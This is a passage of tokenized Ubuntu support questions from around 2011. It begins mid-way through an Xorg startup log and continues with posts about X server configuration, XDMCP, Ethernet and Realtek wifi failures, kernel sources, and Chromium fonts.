screen `` default screen section '' . using a default monitor configuration . [ 465.317 ] ( == ) automatically adding devices [ 465.317 ] ( == ) automatically enabling devices [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/type1 '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( ww ) `fonts.dir ' not found ( or not valid ) in `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' . [ 465.317 ] entry deleted from font path . [ 465.317 ] ( run 'mkfontdir ' on `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' ) . [ 465.317 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , built-ins [ 465.317 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 465.317 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 465.317 ] ( ii ) loader magic : 0x7e0220 [ 465.317 ] ( ii ) module abi versions : [ 465.317 ] x.org ansi c emulation : 0.4 [ 465.317 ] x.org video driver : 10.0 [ 465.317 ] x.org xinput driver : 12.3 [ 465.317 ] x.org server extension : 5.0 [ 465.318 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0613:3842 : c879 rev 162 , mem @ 0xfa000000/16777216 , 0xe0000000/268435456 , 0xf8000000/33554432 , i/o @ 0x0000ac00/128 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 465.318 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 465.318 ] ( ii ) loadmodule : `` extmod '' [ 465.318 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 465.318 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 465.318 ] compiled for 1.10.4 , module version = 1.0.0 [ 465.318 ] module class : x.org server extension [ 465.318 ] abi class : x.org server extension , version 5.0 [ 465.318 ] ( ii ) loading extension mit-screen-saver [ 465.318 ] ( ii ) loading extension xfree86-vidmodeextension [ 465.318 ] ( ii ) loading extension xfree86-dga [ 465.318 ] ( ii ) loading extension dpms [ 465.318 ] ( ii ) loading extension xvideo [ 465.318 ] ( ii ) loading extension xvideo-motioncompensation [ 465.318 ] ( ii ) loading extension x-resource [ 465.318 ] ( ii ) loadmodule : `` dbe '' [ 465.319 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 465.319 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 465.319 ] compiled for 1.10.4 , module version = 1.0.0 [ 465.319 ] module class : x.org server extension [ 465.319 ] abi class : x.org server extension , version 5.0 [ 465.319 ] ( ii ) loading extension double-buffer [ 465.319 ] ( ii ) loadmodule : `` glx '' [ 465.319 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 465.325 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 465.325 ] compiled for 4.0.2 , module version = 1.0.0 [ 465.325 ] module class : x.org server extension [ 465.325 ] ( ii ) nvidia glx module 173.14.30 sat apr 16 22:45:09 pdt 2011 [ 465.325 ] ( ii ) loading extension glx [ 465.325 ] ( ii ) loadmodule : `` record '' [ 465.326 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 465.326 ] ( ii ) module record : vendor= '' x.org foundation '' [ 465.326 ] compiled for 1.10.4 , module version = 1.13.0 [ 465.326 ] module class : x.org server extension [ 465.326 ] abi class : x.org server extension , version 5.0 [ 465.326 ] ( ii ) loading extension record [ 465.326 ] ( ii ) loadmodule : `` dri '' [ 465.326 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 465.326 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 465.326 ] compiled for 1.10.4 , module version = 1.0.0 [ 465.326 ] abi class : x.org server extension , version 5.0 [ 465.326 ] ( ii ) loading extension xfree86-dri [ 465.326 ] ( ii ) loadmodule : `` dri2 '' [ 465.327 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 465.327 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 465.327 ] compiled for 1.10.4 , module version = 1.2.0 [ 465.327 ] abi class : x.org server extension , version 5.0 [ 465.327 ] ( ii ) loading extension dri2 [ 465.327 ] ( == ) matched nvidia as autoconfigured driver 0 [ 465.327 ] ( == ) matched nouveau as autoconfigured driver 1 [ 465.327 ] ( == ) matched nv as autoconfigured driver 2 [ 465.327 ] ( == ) matched vesa as autoconfigured driver 3 [ 465.327 ] ( == ) matched fbdev as autoconfigured driver 4 [ 465.327 ] ( == ) assigned the driver to the xf86configlayout [ 465.327 ] ( ii ) loadmodule : `` nvidia '' [ 465.327 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 465.327 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 465.327 ] compiled for 4.0.2 , module version = 1.0.0 [ 465.327 ] module class : x.org video driver [ 465.327 ] ( ii ) loadmodule : `` nouveau '' [ 465.327 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 465.328 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 465.328 ] compiled for 1.10.1 , module version = 0.0.16 [ 465.328 ] module class : x.org video driver [ 465.328 ] abi class : x.org video driver , version 10.0 [ 465.328 ] ( ii ) loadmodule : `` nv '' [ 465.328 ] ( ww ) warning , could n't open module nv [ 465.328 ] ( ii ) unloadmodule : `` nv '' [ 465.328 ] ( ii ) unloading nv [ 465.328 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 465.328 ] ( ii ) loadmodule : `` vesa '' [ 465.328 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 465.328 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 465.328 ] compiled for 1.10.2 , module version = 2.3.0 [ 465.328 ] module class : x.org video driver [ 465.328 ] abi class : x.org video driver , version 10.0 [ 465.328 ] ( ii ) loadmodule : `` fbdev '' [ 465.328 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 465.329 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 465.329 ] compiled for 1.10.0 , module version = 0.4.2 [ 465.329 ] abi class : x.org video driver , version 10.0 [ 465.329 ] ( ii ) nvidia dlloader x driver 173.14.30 sat apr 16 22:18:29 pdt 2011 [ 465.329 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 465.329 ] ( ii ) nouveau driver date : thu mar 24 02:13:12 2011 +1000 [ 465.329 ] ( ii ) nouveau driver for nvidia chipset families : [ 465.329 ] riva tnt ( nv04 ) [ 465.329 ] riva tnt2 ( nv05 ) [ 465.329 ] geforce 256 ( nv10 ) [ 465.329 ] geforce 2 ( nv11 , nv15 ) [ 465.329 ] geforce 4mx ( nv17 , nv18 ) [ 465.329 ] geforce 3 ( nv20 ) [ 465.329 ] geforce 4ti ( nv25 , nv28 ) [ 465.329 ] geforce fx ( nv3x ) [ 465.329 ] geforce 6 ( nv4x ) [ 465.329 ] geforce 7 ( g7x ) [ 465.329 ] geforce 8 ( g8x ) [ 465.329 ] geforce gtx 200 ( nva0 ) [ 465.329 ] geforce gtx 400 ( nvc0 ) [ 465.329 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 465.329 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 465.329 ] ( -- ) using vt number 7 [ 465.330 ] ( ii ) loading sub module `` fb '' [ 465.330 ] ( ii ) loadmodule : `` fb '' [ 465.330 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 465.330 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 465.330 ] compiled for 1.10.4 , module version = 1.0.0 [ 465.330 ] abi class : x.org ansi c emulation , version 0.4 [ 465.330 ] ( ii ) loading sub module `` wfb '' [ 465.330 ] ( ii ) loadmodule : `` wfb '' [ 465.331 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 465.331 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 465.331 ] compiled for 1.10.4 , module version = 1.0.0 [ 465.331 ] abi class : x.org ansi c emulation , version 0.4 [ 465.331 ] ( ii ) loading sub module `` ramdac '' [ 465.331 ] ( ii ) loadmodule : `` ramdac '' [ 465.331 ] ( ii ) module `` ramdac '' already built-in [ 465.331 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 465.331 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 465.331 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 465.331 ] ( ww ) falling back to old probe method for vesa [ 465.331 ] ( ww ) falling back to old probe method for fbdev [ 465.331 ] ( ii ) loading sub module `` fbdevhw '' [ 465.331 ] ( ii ) loadmodule : `` fbdevhw '' [ 465.331 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 465.331 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 465.331 ] compiled for 1.10.4 , module version = 0.0.2 [ 465.331 ] abi class : x.org video driver , version 10.0 [ 465.331 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 465.331 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 465.331 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 465.331 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 465.331 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 465.331 ] ( ** ) nvidia ( 0 ) : enabling render acceleration [ 465.331 ] ( ii ) nvidia ( 0 ) : support for glx with the damage and composite x extensions is [ 465.331 ] ( ii ) nvidia ( 0 ) : enabled . [ 465.843 ] ( ww ) nvidia ( gpu-0 ) : failed to determine gpu name [ 466.036 ] ( ii ) nvidia ( 0 ) : nvidia gpu unknown ( unknown ) at pci:1:0:0 ( gpu-0 ) [ 466.036 ] ( -- ) nvidia ( 0 ) : memory : 524288 kbytes [ 466.036 ] ( -- ) nvidia ( 0 ) : videobios : 62.92.89.00.7c [ 466.036 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 466.036 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 466.036 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on unknown at pci:1:0:0 : [ 466.036 ] ( -- ) nvidia ( 0 ) : cmo cmc 22 w ( dfp-1 ) [ 466.036 ] ( -- ) nvidia ( 0 ) : cmo cmc 22 w ( dfp-1 ) : 330.0 mhz maximum pixel clock [ 466.036 ] ( -- ) nvidia ( 0 ) : cmo cmc 22 w ( dfp-1 ) : internal dual link tmds [ 466.167 ] ( ii ) nvidia ( 0 ) : assigned display device : dfp-1 [ 466.167 ] ( == ) nvidia ( 0 ) : [ 466.167 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 466.167 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 466.167 ] ( == ) nvidia ( 0 ) : [ 466.167 ] ( ii ) nvidia ( 0 ) : validated modes : [ 466.167 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 466.167 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1680 x 1050 [ 466.190 ] ( -- ) nvidia ( 0 ) : dpi set to ( 90 , 88 ) ; computed from `` useediddpi '' x config [ 466.190 ] ( -- ) nvidia ( 0 ) : option [ 466.190 ] ( == ) nvidia ( 0 ) : enabling 32-bit argb glx visuals . [ 466.190 ] ( ii ) unloadmodule : `` nouveau '' [ 466.190 ] ( ii ) unloading nouveau [ 466.190 ] ( ii ) unloadmodule : `` vesa '' [ 466.190 ] ( ii ) unloading vesa [ 466.190 ] ( ii ) unloadmodule : `` fbdev '' [ 466.190 ] ( ii ) unloading fbdev [ 466.190 ] ( ii ) unloadmodule : `` fbdevhw '' [ 466.190 ] ( ii ) unloading fbdevhw [ 466.190 ] ( -- ) depth 24 pixmap format is 32 bpp [ 466.193 ] ( ii ) nvidia ( 0 ) : initialized gpu gart . [ 466.195 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 466.241 ] ( ii ) loading extension nv-glx [ 466.296 ] ( ii ) nvidia ( 0 ) : nvidia 3d acceleration architecture initialized [ 466.303 ] ( ii ) nvidia ( 0 ) : using the nvidia 2d acceleration architecture [ 466.303 ] ( == ) nvidia ( 0 ) : backing store disabled [ 466.303 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 466.313 ] ( == ) nvidia ( 0 ) : dpms enabled [ 466.313 ] ( ii ) loading extension nv-control [ 466.314 ] ( == ) randr enabled [ 466.314 ] ( ii ) initializing built-in extension generic event extension [ 466.314 ] ( ii ) initializing built-in extension shape [ 466.314 ] ( ii ) initializing built-in extension mit-shm [ 466.314 ] ( ii ) initializing built-in extension xinputextension [ 466.314 ] ( ii ) initializing built-in extension xtest [ 466.314 ] ( ii ) initializing built-in extension big-requests [ 466.314 ] ( ii ) initializing built-in extension sync [ 466.314 ] ( ii ) initializing built-in extension xkeyboard [ 466.314 ] ( ii ) initializing built-in extension xc-misc [ 466.314 ] ( ii ) initializing built-in extension security [ 466.314 ] ( ii ) initializing built-in extension xinerama [ 466.314 ] ( ii ) initializing built-in extension xfixes [ 466.314 ] ( ii ) initializing built-in extension render [ 466.314 ] ( ii ) initializing built-in extension randr [ 466.314 ] ( ii ) initializing built-in extension composite [ 466.314 ] ( ii ) initializing built-in extension damage [ 466.314 ] ( ii ) initializing built-in extension gesture [ 466.315 ] ( ii ) initializing extension glx [ 466.328 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 466.335 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 466.335 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 466.335 ] ( ii ) loadmodule : `` evdev '' [ 466.335 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 466.336 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 466.336 ] compiled for 1.10.2 , module version = 2.6.0 [ 466.336 ] module class : x.org xinput driver [ 466.336 ] abi class : x.org xinput driver , version 12.3 [ 466.336 ] ( ii ) using input driver 'evdev ' for 'power button' [ 466.336 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 466.336 ] ( ** ) power button : always reports core events [ 466.336 ] ( ** ) power button : device : `` /dev/input/event1 '' [ 466.336 ] ( -- ) power button : found keys [ 466.336 ] ( ii ) power button : configuring as keyboard [ 466.336 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 466.336 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 466.336 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 466.336 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 466.336 ] ( ** ) option `` xkb_layout '' `` us '' [ 466.339 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 466.339 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 466.339 ] ( ii ) using input driver 'evdev ' for 'power button' [ 466.339 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 466.339 ] ( ** ) power button : always reports core events [ 466.339 ] ( ** ) power button : device : `` /dev/input/event0 '' [ 466.339 ] ( -- ) power button : found keys [ 466.339 ] ( ii ) power button : configuring as keyboard [ 466.339 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 466.339 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard ) [ 466.339 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 466.339 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 466.339 ] ( ** ) option `` xkb_layout '' `` us '' [ 466.392 ] ( ii ) power button : close [ 466.392 ] ( ii ) unloadmodule : `` evdev '' [ 466.392 ] ( ii ) unloading evdev [ 466.408 ] ( ii ) power button : close [ 466.408 ] ( ii ) unloadmodule : `` evdev '' [ 466.408 ] ( ii ) unloading evdev [ 466.754 ] ddxsiggiveup : closing log update escott on efnet pointed out that i do not have a /etc/x11/xorg.conf file . i ran xorg -configure which generated one but also gave me this error output : x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server x86_64 ubuntu current operating system : linux maximos-ubuntu 3.0.0-12-server # 20-ubuntu smp fri oct 7 16:36:30 utc 2011 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.0.0-12-server root=uuid=ffdf63ee-6980-46dc-bc6d-b1e72e0abcce ro build date : 19 october 2011 05:21:26am xorg-server 2:1.10.4-1ubuntu4.2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : wed dec 28 18:50:40 2011 list of video drivers : trident tdfx siliconmotion vmware neomagic nouveau nvidia r128 qxl savage radeon vmwlegacy ati intel mga sisusb cirrus openchrome sis mach64 s3 fbdev vesa ( ee ) failed to load module `` vmwgfx '' ( module does not exist , 0 ) ( ee ) vmware : please ignore the above warnings about not being able to to load module/driver vmwgfx ( ++ ) using config file : `` /home/paul/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) [ drm ] no dricreatepcibusid symbol number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log escott also pointed out i was missing xterm . i installed it via apt-get . now when i run xinit my screen will change resolution and i have what appears to be a command line that looks like root @ myhostname : ~ # xeyes and xlogo will output error : ca n't open display :
90916	get kernel sources for lubuntu ?	answer : git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-oneiric.git works great for ubuntu . question : does lubuntu have such a git server that i can clone from ?
90920	xdmcp setup for lightdm , ports not listening	i 'm using ubuntu 11.10 , lightdm . it appears my xdmcp service is setup correctly , but it wo n't connect . i have the following in /etc/lightdm/lightdm.conf : [ xdmcpserver ] enabled=true to restart lightdm the following command is issued : sudo restart lightdm this produces the following log file in /var/log/lightdm/lightdm.log : [ +0.01s ] debug : launching x server [ +0.01s ] debug : launching process 6947 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +0.01s ] debug : waiting for ready signal from x server :0 [ +0.01s ] debug : starting xdmcp server on udp/ip port 177 [ +0.02s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.02s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.17s ] debug : got signal 10 from process 6947 no errors . so far so good.. looks like the xdmcp service is started . however , even though it looks like it 's started without any error , it fails to connect . the problem may be related to nothing listening on tcp port 6000 ? netstat -l reveals the following : udp 0 0 * : xdmcp * : * udp 0 0 *:34000 * : * udp 0 0 * : mdns * : * udp6 0 0 [ : : ] : xdmcp [ : : ] : * which shows the xdmcp 177 port listening , but nothing in netstat shows tcp port 6000 listening : netstat -l | grep 6000 returns nothing . is n't xdmcp supposed to be listening on port 6000 ? a client trying to connect just times out . the funny part is it was working before , and we ca n't think of any configuration change which would have effected xdmcp . trouble shooting seems to point to the 6000 port not listening , but we never validated this port was being used earlier when it was working .
90922	ethernet fails after a few minutes on ubuntu 10.10 -- ca n't reactivate without restart	i just got a new toshiba satellite c650 and set it up to dual boot ubuntu 10.10 and windows 7 . ubuntu will be my primary os , but i 'm having a weird problem with wired ethernet : when plugged into my home lan , ethernet works fine on startup , but eventually fails . when it fails , i ca n't restart it -- not by disconnecting/reconnecting the cable , playing with options in the network manager , or running /etc/init.d/networking restart . some other symptoms : no trouble at all in windows 7 . the problem seems to happen more frequently when other devices ( e.g . my other laptop ) are also using the modem . none of the other devices has this problem though . a side note : at the moment , wireless is n't working at all , but i plan to cross that bridge later -- unless it turns out to be a related problem . lspci gives me this : ... 01:00.0 ethernet controller : atheros communications ar8152 v2.0 fast ethernet ( rev c1 ) 02:00.0 network controller : realtek semiconductor co. , ltd. device 8176 ( rev 01 ) looking up the specs in windows , i find that the realtek controller is an rtl8188ce . after the ethernet fails , the last line of /var/log/syslog will be something like : dec 27 20:29:05 abe-laptop kernel : [ 1661.352824 ] eth0 : no ipv6 routers present . last but not least , here 's the tail end of /var/log/syslog after i try to reconnect : dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) starting connection 'auto eth0' dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : device state change : 3 - > 4 ( reason 0 ) dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : device state change : 4 - > 5 ( reason 0 ) dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : device state change : 5 - > 7 ( reason 0 ) dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > dhclient started with pid 2177 dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . dec 27 20:46:34 abe-laptop dhclient : internet systems consortium dhcp client v3.1.3 dec 27 20:46:34 abe-laptop dhclient : copyright 2004-2009 internet systems consortium . dec 27 20:46:34 abe-laptop dhclient : all rights reserved . dec 27 20:46:34 abe-laptop dhclient : for info , please visit https : //www.isc.org/software/dhcp/ dec 27 20:46:34 abe-laptop dhclient : dec 27 20:46:34 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit dec 27 20:46:34 abe-laptop dhclient : listening on lpf/eth0/00:26:6c : df:1c : f8 dec 27 20:46:34 abe-laptop dhclient : sending on lpf/eth0/00:26:6c : df:1c : f8 dec 27 20:46:34 abe-laptop dhclient : sending on socket/fallback dec 27 20:46:34 abe-laptop dhclient : dhcprequest of [ an ip address ] on eth0 to 255.255.255.255 port 67 dec 27 20:46:51 abe-laptop dhclient : last message repeated 3 times dec 27 20:46:51 abe-laptop dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 dec 27 20:46:54 abe-laptop dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 4 dec 27 20:47:06 abe-laptop dhclient : last message repeated 2 times dec 27 20:47:06 abe-laptop dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 10 dec 27 20:47:16 abe-laptop dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 19 dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < warn > ( eth0 ) : dhcpv4 request timed out . dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 2177 dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure timeout ) scheduled ... dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure timeout ) started ... dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : device state change : 7 - > 9 ( reason 5 ) dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > marking connection 'auto eth0 ' invalid . dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < warn > activation ( eth0 ) failed . dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > activation ( eth0 ) stage 4 of 5 ( ip4 configure timeout ) complete . dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : device state change : 9 - > 3 ( reason 0 ) dec 27 20:47:19 abe-laptop networkmanager [ 997 ] : < info > ( eth0 ) : deactivating device ( reason : 0 ) . i 've hunted around through several forums and found various discussions about problems that seem similar , but none of them seems to match exactly . any suggestions on how to diagnose and fix this problem ?
90927	is there a way to disable the run command dialog in kde ?	how can i if possible disable the run command dialog ? . it keeps appearing even if i do n't press the key combination . ( i have disabled the key combination alt+f2 ) disable it as in prevent it from ever running again , ever .
90929	can i keep using ubuntu 9.04 if it 's outdated ?	i have a very old laptop ( 6-7 years ) with a 1.6 ghz intel processor and 512 mb ddr2 of ram and i was wondering if i can keep this version of ubuntu ( 9.04 ) installed on it . i 've installed the 11.10 version but it 's extremely slow on my laptop , some times it even hangs if i open more than 3 tabs in firefox . my main problem is that i ca n't update any of my drivers or even install new ones since this version that i 'm using is outdated . at the moment i 'm using a freshly installed ubuntu 9.04 with zero updates because when i installed 11.10 i chose to do a full format over it since i had almost nothing important on my hard disk worth keeping . ( i remember that when i first installed ubuntu 9.04 and successfully connected to the internet , everything was easy . )
90931	can the font used by chromium/chrome in the tabs be changed to a larger size ?	i have changed my resolution from 1280x800 to 1776x1000 and adjusted all my fonts accordingly , however the tabs in chromium look very small , the font is nearly impossible to read also the pixel arrangement of the fonts used in chromium is horrendous . i have downloaded another browser , and the fonts look better than they do in chromium , but i love chromium so want to fix the font problem there . how can i do that ? .
90933	realtek rtl8188ce wifi adapter does n't connect reliably	i recently bought a new system76 laptop which came pre-installed with ubuntu 11.10 . i 've been having trouble with my wireless connectivity . it seems that my connection with my wireless network keeps going in and out . it is not my network -- i have seen the same problem on multiple wifi networks and at different distances and reported link qualities . os version : ubuntu 11.10 oneiric kernel version : 3.0.0-14-generic lspci : lspci -nnk | grep -ia2 net 04:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:9196 ] kernel driver in use : rtl8192ce -- 05:00.0 ethernet controller [ 0200 ] : jmicron technology corp. jmc250 pci express gigabit ethernet controller [ 197b:0250 ] ( rev 05 ) subsystem : clevo/kapok computer device [ 1558:2500 ] kernel driver in use : jme iwconfig : iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : '' peppermintpatty '' mode : managed frequency:2.462 ghz access point : 98 : fc:11:6c : e0:22 bit rate=72.2 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=49/70 signal level=-61 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1103 missed beacon:0 lshw : sudo lshw -class network *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : 00:1c:7b : a1:95:04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.0.0-14-generic firmware=n/a ip=192.168.1.106 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 ioport : e000 ( size=256 ) memory : f7d00000-f7d03fff *-network description : ethernet interface product : jmc250 pci express gigabit ethernet controller vendor : jmicron technology corp. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 00:90 : f5 : c0:42 : b3 size : 10mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm pciexpress msix msi bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=jme driverversion=1.0.8 duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:56 memory : f7c20000-f7c23fff ioport : d100 ( size=128 ) ioport : d000 ( size=256 ) memory : f7c10000-f7c1ffff memory : f7c00000-f7c0ffff any help would be appreciated . the last time i 've dealt with wireless issues , the most given solution was ndis wrapper and i seem sorely out-of-date .
